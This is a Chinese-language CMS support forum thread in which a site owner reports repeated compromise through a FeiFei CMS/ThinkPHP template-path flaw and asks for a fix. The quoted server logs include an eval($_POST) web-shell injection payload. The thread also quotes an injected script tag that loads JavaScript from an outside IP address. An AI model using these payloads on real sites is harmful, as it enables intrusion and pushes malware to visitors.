飞飞CMS官方论坛
标题:
老大,就是这个漏洞啊,怎么修复啊,天天挂马
[打印本页]
作者:
ooola
时间:
2015-3-24 21:32
标题:
老大,就是这个漏洞啊,怎么修复啊,天天挂马
漏洞危害等级非常高,只要被盯上了,有的烦哦。
wooyun.org/bugs/wooyun-2010-082291
下面是后台监控到的日志。
[ 2015-03-24T20:08:54+08:00 ] ERR: (ThinkException) 模板不存在[my_\..\runtime\logs\15_03_16.log]
[ 2015-03-24T20:09:09+08:00 ] ERR: (ThinkException) 模板不存在[my_\..\runtime\logs\15_03_16.log]
[ 2015-03-24T20:09:20+08:00 ] ERR: (ThinkException) 模板不存在[my_\..\runtime\logs\{~eval($_POST[x])}]
[ 2015-03-24T20:09:20+08:00 ] ERR: (ThinkException) 模板不存在[./Tpl/1080p/Home/my_new.html]
[ 2015-03-24T20:09:26+08:00 ] ERR: (ThinkException) 模板不存在[./Tpl/1080p/Home/my_new.html]
挂马的就是这个 狗日的。:
document.write('<script type="text/javascript" src="htt##p:/###/121.40.113.68/header.js"></script>');
发不了连接 #号隔开
当前处理办法:tpl 目录完全不可写。木马就写到 runtime 目录了
作者:
tom
时间:
2015-3-25 11:36
哪个版本的?我怎么没有呢
作者:
淘金者
时间:
2015-3-25 12:09
这个不是最新版本的漏洞吧
作者:
tom
时间:
2015-3-25 12:51
哦,那就好,我用的3.0的,只要3.0没有就ok
作者:
wwi
时间:
2015-3-25 12:59
版本2.9的 这个漏洞很隐瞒,别高兴太早了,应该是哪里过滤不严。
用手机访问 ff 建的站,很多都中招。
平常是很难发现的。一打开下载 apk 安卓软件
好多人中了 都不知道的。
作者:
nilo
时间:
2015-3-28 02:05
3.0也有漏洞的.在会员系统这块.
作者:
846262261
时间:
2015-4-18 10:20
thinkphp框架问题吧 这框架好久都不更新的 自己更新下吧
欢迎光临 飞飞CMS官方论坛 (http://bbs.feifeicms.wang/)
Powered by Discuz! X3.2